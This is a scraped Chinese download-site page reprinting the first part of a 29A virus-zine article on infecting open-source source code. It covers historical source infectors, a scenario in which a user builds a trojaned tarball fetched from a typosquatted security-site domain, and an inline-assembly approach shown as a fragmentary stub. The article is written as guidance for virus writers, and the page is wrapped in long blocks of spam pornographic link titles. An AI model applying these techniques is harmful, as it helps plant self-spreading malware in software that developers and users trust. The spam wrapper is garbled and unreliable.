亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? 29a-7.017

?? 從29A上收集的病毒源碼
?? 017
?? 第 1 頁 / 共 3 頁
字號:

Join us now and share the malware...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reflections  about the  Open Source  and Free  Software community  and
their blind believe in the goodness of the source code.

by zert <zert@int80h.net>

0.- Abstract
1.- Introduction
2.- Precedents
    2.1.- DOS viruses, Urphin
    2.2.- 1994, SrcVir virus family and Die-Hard virus
    2.3.- Compiler libraries' infectors
    2.4.- Any scripting language virus code
3.- Why try to infect source code?
4.- OK, but... how?
    4.1.- Typical scenario
    4.2.- ASM inline approach
    4.3.- "Quine" approach
    4.4.- Future developments
5.- Conclusions
6.- Related links


0.- Abstract

In this  article we'll  talk about  the possibilities  of infection of
source code files, the precedents  that have been in this  subject and
the future developments that could happen.

The text will be enclosed with  examples in C, as "proofs of  concept"
of the  explained details.  Besides, virus  development techniques for
source  code  through  other  ways  will  be  presented,  from  a less
practical  point  of  view  and   showing  the  main  steps  for   its
programming.


1.- Introduction

As the Free Software Foundation  famous song [1] says, nowadays  a lot
of people  are joining  the Free  Software movement  or other variants
(more  commercial) as  the Open  Source movement.  The title  of this
article wants to wink  at this song's chorus  ("Join us now and  share
the software, you'll  be free, hackers,  you'll be free..."),  showing
the  possibility of  this distribution  capacity which  has taken  the
source code in these kind of  environments, could be used in order  to
hand out again viral code.

Many of  us are  starting to  develop an  almost blind  faith in those
developers of  open source  programs because  the code  is visible, it
will  be much  more difficult  to be  cheated and  the possibility  to
insert not wanted effects into  these programs will be reduced.  If we
think about it, when we go to  a magic show, many of the magic  tricks
need a curtain, a wall or  something to hide how we are  being fooled,
but  there are  many other  tricks that  are made  face in  our face,
without using anything else but the hands and, even like this, we fall
and we believe them. Something  similar could happen with open  source
programs: the  code is  there and  everybody can  see and  examine it,
however, only a very few do it (who has audited the *whole* code which
is running through his box?).  And, besides, it would be  occasionally
possible  to  obfuscate  the  code  to  make  highly  difficult  to be
understood and to be able to insert hidden elements, not wanted by the
user of that code.

Source code viruses never have been a real threat, basically  because,
until near today, to interchange programs distributing the source code
was something very unusual outside a too geek environment. The viruses
have  had  their  natural  habitat  within  the  executable  programs,
typically binaries, that have been distributed hand by hand during all
these  years.  Although P2P  networks  have returned  to  relaunch the
massive interchange of binaries, it seems to be that this approach  is
going progressively  down and  than what  rules right  now is to think
about  an  approach  of  the  type  virus  +  worm,  using   different
workstations or servers like infection vectors.

Nowadays,  interchanging  programs  using  the  source  code  is   not
something of computer freaks. In  the world of Free Software  and Open
Source, this is  the most common  way to distribute  the code. Usually
the code is audited at least  by the author of itself, although  there
are a lot  of myths about  this. Anyway, some  cases have happened  in
which the official FTP server has been cracked and the original source
of  the  code  has  been  changed  [3]  [4].  In  those  occasions the
introduced code was very obvious, but a more subtle attack could  have
been tried.

I  don't  know whether  in  a further  P2P  networks will  be  full of
tarballs with the source code of a lot of programs or whether auditing
the source code will be an automatizable task (where it would appear a
new  battle  scene  between auditors  and  malware  writers), but  the
verifiable fact is that in this very moment the interchange of  source
code is increasing and, because of it, it is necessary to analyse  the
convenience of its use as infection vector.


2.- Precedents

Up to now, a few and shy infectors have been developed with the target
of infecting the source code. We are going to explain the reasons: the
source code has not been  a goog infection method until  the irruption
of the "open source revolution" on the curren scene.


2.1. DOS viruses, Urphin

In  the distant  pass age  of DOS  viruses, Urphin  virus [5]  already
thought of infecting  source code as  a spread method.  This behaviour
was  not strange  at all:  once came  out, it  remained resident  (31h
service of int 21h), waiting for the execution of the program  TPC.EXE
(Turbo Pascal Compiler) and it was at that moment when it  intercepted
the  .PAS files  which contain  the source  code of  the programs  in
Pascal.

Once  found the  .PAS file,  it looked  for the  word "BEGIN",  which
indicates the  beginning of  a code  block in  Pascal, an  it added  a
hexadecimal dump of its  code together with the  code in Pascal to  be
executed. When the  file was closed,  the virus eliminated  the source
code just  inserted in  order to  make clean  the infected source code
after having generated the executable binary.


2.2.- 1994, SrcVir virus family and Die-Hard virus

In many  web pages  in which  the history  of computer  [6] viruses is
explained, SrcVirus family is mentioned. It appeared in 1994  together
with a stream of new viruses with strange targets and behaviours up to
that date. The aim  of this virus family  was mainly to infect  source
code files written in  C and Pascal, in  similar way to the  mentioned
Urphin.

The same  year, it  was programmed  and released  another virus  which
infected the source code, the Die-Hard virus [7]. This virus is  quite
standard (COM  and EXE  infector in  DOS), except  for one feature: it
looks  for  .ASM  and  .PAS files,  assembly  and  Pascal  source code
respectively, in order to add a dump of its code.


2.3.- Compiler libraries' infectors

There are viruses which have the target of infecting OBJ and LIB files
[8] in order to add its code to modules or libraries that will be used
afterwards to be  linked with executable  code. The infected  files in
this way would  act just as  "carriers", waiting for  am executable to
link with these modules or libraries and to go on spreading the virus.
In this  way, the  executable files  would not  infect the  executable
files their self, so  that it wouldn't be  the risk of self  infection
and it  should not  be observed  in the  virus code,  and the infected
files  are  useless until  its  code is  included  into a  executable,
remaining in a "latent" state until that happens.


2.4.- Any scripting language virus code  

Obviously, any viruses  which is written  in a scripting  language and
which has the target of  infecting other scripts, will be  an infector
which copies  its source  code in  the guest  file. There  are several
approaches to this kind of virus in Perl or Shell Scripts [9] [10] and
countless  Internet worms  written in  Visual Basic  Script and  other
kinds of scripting languages.


3.- Why try to infect source code?

As we have  mentioned before, it's  possible to be  an expanding field
and several factors prove it:

* The  increasing interest  about Operating  Systems as  GNU/Linux and
*BSD generates an users community whose main value is the source  code
and this one is user as change  coin. Some of these new users are  far
away from the  original idea of  a UNIX hacker,  and they become  less
technical (using the computer as a quite modern washing machine).

* The  growing interest  of Governments  and Public  entities in using
open source software in order to increase its security. Open source is
not  itself (inherently)  more secure  than close  source software  if
appropriate measures  are not  taken. There  are a  lot of myths about
this [2], apart from many attempts from Microsoft in order to  deceive
the consumer with half the truth [13].

* Some  program demand  to be  compiled in  each computer  separately,
either because it is free software that links with property  libraries
or codecs,  or because  it can  be an  enormous difference between the
generic  version  for  i386  and this  one  compiled  in  the specific
computer.  This  fact  demands  a  development  environment  in   more
computers.  The  paradigmatic  example of  this  case  is the  Mplayer
multimedia player.


4.- OK, but... how?

4.1.- Typical scenario

Bob is a young sysadmin fascinated by wireless networks. His knowledge
about  computer  networks  are  advanced, but  he  has  no  idea about
programming further a few simple shell scripts.

At a very  enjoyable wardriving evening,  when he and  his friend Dave
are listening to  Massive Attack and  pursue among routers  of a local
company, Bob is astonished of the great program that Dave has to  scan
wireless networks. Eager, he asks  him the URL to download  it without
further delay:

wget http://packetstormsecurify.nl/sniffers/wireless/wlanthrax-0.6.9.tar.gz
tar xzf wlanthrax-0.6.9.tar.gz
cd wlanthrax-0.6.9
./configure
make
make install

(advisory: http://packetstormsecurify.nl doesn't exist but it could be
bought in a reasonable price. Any resemblance with the coincidence, is
real truth)

Yeah! The program is working and the networks are surrending as scared
rats, tons of adrenaline! like in the old times! What poor Bob doesn't
know is that this tarball contained malware and now he has it  running
through the digital veins of his laptop.

The same thing had happened to Bob before, and from that time he never
do this as root user. Obviously, "make install" command wouldn't  ever
work as a normal user, but  the tool would go on being  executable and
usable. Clever boy, but even from a normal user account, we could  try
to  infect  the  whole  source  code  that  we  can  reach  with those
privileges, which can be enough.

Do you think this situation is improbable? How many times have we done
tar xzf && ./configure && make  && make install blindly? I admit  that
sometimes I've installed software in that way O;-D


4.2.- ASM inline approach

Every virus coder knows reverse engineering tools which provide a high
quality  disassemblies.  Quickly  come   to  my  mind  names   as  IDA
disassembler or even the disassembly view mode of HIEW (Hackers View).
The port for UNIX of HIEW, BIEW (which is really his "small  brother")
also supports the  disassembly view and  we can see  easily the source
code in assembler of any program.

An ASM inline approach to infect source files should implement a small
disassembler of its own code, to  be able to include it in  the source
code file. If we take as a reference the source code written in C used
in GNU/Linux, we should create  a disassembler for our code  with AT&T
syntax, and include this code in a function:

int virus()
{
  __asm__(
  	"pusha\n\t"
	"call 0x8048086\n\t"
	[...]
	"mov $0x1,%%eax\n\t"
	"int $0x80"
  );
}

To obtain that disassembly we can use the Free Software philosophy and
get the code that  does that work in  BIEW or objdump tools.  The main
problem of doing in that way is that the disassembler would take up  a
very important part of our virus code, so we can discard this and  try
to call that tools directly: if our aim is to infect the source  code,
we can suppose that the infected computer is a development workstation
which can have  those tools installed.  Using the syscall  "execve" in
UNIX we could execute one of those tools and generate the printout  in
a son process. An optimised version of this point of view would  check
whether there are some of the most common tools which could make  this
job.

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
福利电影一区二区三区| 国产成人亚洲综合色影视| 亚洲三级在线免费观看| 亚洲一区二区三区四区五区中文| 一本色道久久综合亚洲91| 亚洲最新在线观看| 欧美日本免费一区二区三区| 人人爽香蕉精品| 精品免费日韩av| 成人黄色电影在线| 一区二区三区在线视频免费观看 | 555www色欧美视频| 美日韩一区二区三区| 久久久久久亚洲综合影院红桃| 成人综合婷婷国产精品久久 | 国产精品久久久久久久久免费桃花 | 日韩欧美一级片| 国产乱人伦偷精品视频免下载| 久久精品亚洲麻豆av一区二区| 成人高清视频在线| 亚洲综合成人网| 2023国产一二三区日本精品2022| www.亚洲免费av| 无码av中文一区二区三区桃花岛| 久久久久国产一区二区三区四区| 91麻豆成人久久精品二区三区| 奇米影视一区二区三区小说| 国产精品美日韩| 欧美放荡的少妇| 成人av在线资源| 免费看黄色91| 日韩美女视频一区二区| 538在线一区二区精品国产| 成人精品亚洲人成在线| 日本欧美久久久久免费播放网| 国产精品亲子伦对白| 91精品国产色综合久久不卡电影| 粉嫩欧美一区二区三区高清影视| 亚洲午夜激情网页| 日本一区二区三区久久久久久久久不 | 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 欧美丝袜丝交足nylons图片| 黄网站免费久久| 亚洲成人一区在线| 国产精品欧美精品| 欧美一卡二卡三卡| 日本道在线观看一区二区| 国产精品18久久久久久久久久久久| 亚洲国产精品精华液网站| 国产精品视频免费| 精品88久久久久88久久久| 欧美三电影在线| 91在线精品一区二区| 国产99久久久久久免费看农村| 三级成人在线视频| 一区二区三区四区精品在线视频 | 国产精品99久久久久久似苏梦涵 | 蜜臀av性久久久久蜜臀av麻豆| 夜夜嗨av一区二区三区网页 | 高清成人在线观看| 韩国精品一区二区| 日本亚洲电影天堂| 亚洲国产综合视频在线观看| 亚洲日本在线看| 国产精品久久久久久户外露出| 久久久91精品国产一区二区精品 | 欧美日韩国产综合一区二区| 91小宝寻花一区二区三区| 国产91在线看| 国产91在线观看丝袜| 国产在线精品不卡| 久久www免费人成看片高清| 美女视频黄a大片欧美| 另类专区欧美蜜桃臀第一页| 五月天激情综合| 蜜臀国产一区二区三区在线播放| 日本中文字幕一区二区视频| 日韩av高清在线观看| 日韩不卡一二三区| 看电影不卡的网站| 国产一区二区成人久久免费影院 | 欧美自拍丝袜亚洲| 在线视频欧美区| 欧美久久久影院| 91精品国产色综合久久不卡蜜臀 | 91精品国产综合久久久蜜臀粉嫩| 69p69国产精品| 精品免费视频.| 欧美激情一区二区三区不卡 | 成人欧美一区二区三区黑人麻豆| 国产精品二三区| 亚洲午夜电影网| 免费观看在线综合| 国产精品一区二区三区四区| 东方aⅴ免费观看久久av| 99久精品国产| 欧美日韩精品一区二区三区四区| 欧美一区二区三区精品| 久久综合九色欧美综合狠狠| 国产精品伦一区| 亚洲小说欧美激情另类| 免费在线一区观看| 国产精品白丝jk黑袜喷水| 91在线视频网址| 日韩三级视频在线观看| 国产视频一区二区在线| 一区二区不卡在线播放| 狠狠色2019综合网| 91亚洲国产成人精品一区二三| 欧美卡1卡2卡| 欧美激情一区二区三区四区| 亚洲一区二区欧美| 国产在线视频精品一区| 91麻豆国产在线观看| 日韩欧美一区二区视频| 国产精品伦一区| 日本va欧美va精品| 不卡一区在线观看| 7777女厕盗摄久久久| 日本一区二区三区久久久久久久久不 | 国产大陆a不卡| 欧美色爱综合网| 国产精品久久看| 蜜臀av一区二区在线观看| 91色porny在线视频| 欧美大片在线观看一区二区| 成人欧美一区二区三区小说 | 色综合久久综合| 国产午夜精品一区二区三区四区| 亚洲国产精品久久人人爱| 成人一级片网址| 欧美成人女星排名| 亚洲国产裸拍裸体视频在线观看乱了| 国产精品一区二区黑丝| 777午夜精品免费视频| 亚洲男帅同性gay1069| 国产成人h网站| 日韩免费视频一区| 午夜影院久久久| 色悠久久久久综合欧美99| 久久久天堂av| 麻豆中文一区二区| 欧美日韩你懂得| 一区二区在线免费| 99久久精品费精品国产一区二区| 久久精品人人爽人人爽| 另类人妖一区二区av| 91精品国产欧美一区二区18| 亚洲午夜在线电影| 色婷婷精品久久二区二区蜜臀av| 亚洲国产精华液网站w| 国产成人综合在线观看| 欧美成人一区二区三区| 日韩精品成人一区二区三区| 欧美亚洲一区二区三区四区| 日韩久久一区二区| 成年人国产精品| 国产精品不卡视频| aaa亚洲精品| 亚洲摸摸操操av| 91在线高清观看| 亚洲人成网站精品片在线观看| 成人永久免费视频| 国产精品成人免费精品自在线观看 | 国产精品亚洲综合一区在线观看| 91精品国产综合久久精品图片| 亚洲成人资源网| 日韩一区二区免费在线观看| 日韩经典中文字幕一区| 欧美日韩mp4| 免费观看日韩电影| 日韩一区二区在线看片| 六月丁香综合在线视频| 久久综合九色综合97婷婷| 国产电影精品久久禁18| 国产精品情趣视频| 色婷婷精品久久二区二区蜜臂av | 自拍偷拍欧美激情| 色菇凉天天综合网| 亚洲一卡二卡三卡四卡五卡| 欧美日韩综合色| 男人操女人的视频在线观看欧美| 日韩欧美中文字幕一区| 青青草国产成人99久久| 久久亚洲二区三区| 99麻豆久久久国产精品免费 | 国产女主播视频一区二区| 99久久伊人精品| 亚洲午夜久久久久久久久电影院| 欧美精品18+| 国产精品自拍一区| 中文字幕中文字幕在线一区 | 国产999精品久久久久久绿帽| 中文字幕一区二区三区不卡在线| 色视频欧美一区二区三区| 天堂成人国产精品一区| 亚洲精品在线网站| 色老汉一区二区三区| 久久精品国产99国产精品| 国产精品美女久久久久高潮|